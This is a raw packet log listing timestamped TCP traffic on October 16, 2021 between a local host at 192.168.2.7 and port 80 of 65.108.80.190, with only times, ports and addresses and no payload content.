Oct 16, 2021 16:53:23.947793007 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.947801113 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947818041 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947833061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947837114 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.947845936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947865009 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947881937 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947890043 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.947897911 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947911024 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947926998 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947945118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947962999 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947967052 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.947978973 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.947994947 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948007107 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948019028 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948024035 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.948029995 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948043108 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948057890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948074102 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948081970 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.948086023 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948097944 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948110104 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948121071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948128939 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.948132038 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948144913 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948157072 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948168039 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948179960 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948195934 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948208094 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948223114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948241949 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948245049 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.948260069 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948276043 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948291063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948307037 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948322058 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948338032 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948354006 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948364019 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.948414087 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948430061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948436022 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.948441982 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948457003 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948472023 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948487997 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948503017 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948504925 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.948522091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948539019 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948554993 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948570967 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948586941 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.948590040 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.948678970 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.987703085 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.987746000 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.987775087 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.987799883 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.987819910 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.987826109 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.987854004 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.987878084 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.987880945 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.987905025 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.987929106 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.987935066 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.987953901 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.987963915 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.987979889 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.987992048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988024950 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988035917 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988054037 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988070011 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988084078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988111973 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988111973 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988133907 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988142967 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988173008 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988198996 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988205910 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988230944 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988234043 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988262892 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988265038 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988295078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988311052 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988336086 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988363981 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988372087 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988394976 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988404989 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988430023 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988435030 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988451958 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988470078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988480091 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988502026 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988527060 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988531113 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988552094 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988563061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988589048 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988595009 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988611937 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988625050 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988640070 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988656044 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988671064 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988686085 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988699913 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988718987 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988733053 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988750935 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988774061 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988792896 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988796949 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988820076 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988845110 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:23.988845110 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988868952 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:23.988887072 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.448883057 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488419056 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488456964 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488487005 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488518953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488528013 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488549948 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488560915 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488591909 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488601923 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488615036 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488642931 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488673925 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488677025 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488692045 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488718987 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488745928 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488759995 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488779068 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488801003 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488831043 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488852024 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488886118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488909006 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488924980 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.488943100 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488982916 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.488997936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489036083 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489065886 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489080906 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489094973 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489105940 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489134073 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489146948 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489181042 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489207983 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489214897 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489248991 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489279032 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489310026 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489353895 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489396095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489420891 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489444971 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489454031 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489468098 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489470005 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489490986 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489495039 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489520073 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489523888 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489543915 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489548922 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489563942 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489571095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489598989 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489605904 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489624023 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489634991 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489645958 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489649057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489674091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489679098 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489691019 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489696980 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489720106 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489743948 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489754915 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489769936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489778042 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489798069 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.489809990 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.489856958 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529113054 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529138088 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529150963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529177904 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529196024 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529212952 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529227018 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529238939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529252052 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529268980 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529273033 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529292107 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529309034 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529326916 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529344082 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529361963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529362917 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529378891 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529397011 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529418945 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529438019 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529453993 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529467106 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529479027 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529489994 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529501915 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529514074 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529515028 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529526949 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529551983 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529576063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529593945 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529599905 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529609919 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529627085 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529648066 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529658079 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529670954 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529687881 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529702902 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529706955 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529715061 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529727936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529740095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529752016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529768944 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529784918 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529804945 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529807091 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529823065 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529839039 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529856920 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529869080 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529871941 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529890060 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529907942 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529920101 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529923916 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.529992104 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.529997110 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530024052 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530042887 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530049086 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530071974 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530092001 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530107975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530128956 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530147076 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530231953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530235052 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530251026 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530262947 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530281067 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530292988 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530302048 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530304909 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530316114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530373096 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530390978 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530395985 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530407906 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530426979 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530447006 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530457973 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530503988 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530523062 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530525923 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530548096 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530559063 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530571938 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530592918 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530596018 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530620098 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530646086 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530668974 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530678034 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530689001 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530713081 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530735970 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530754089 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530776024 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530795097 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530807972 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530817986 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.530848980 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.530884981 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.568864107 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.568928003 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.568978071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.568988085 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569025040 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569036007 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569053888 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569092035 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569097042 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569148064 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569152117 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569202900 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569253922 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569267035 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569308996 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569360018 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569380045 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569380999 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:24.569422007 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:24.569448948 CEST	49737	80	192.168.2.7	65.108.80.190
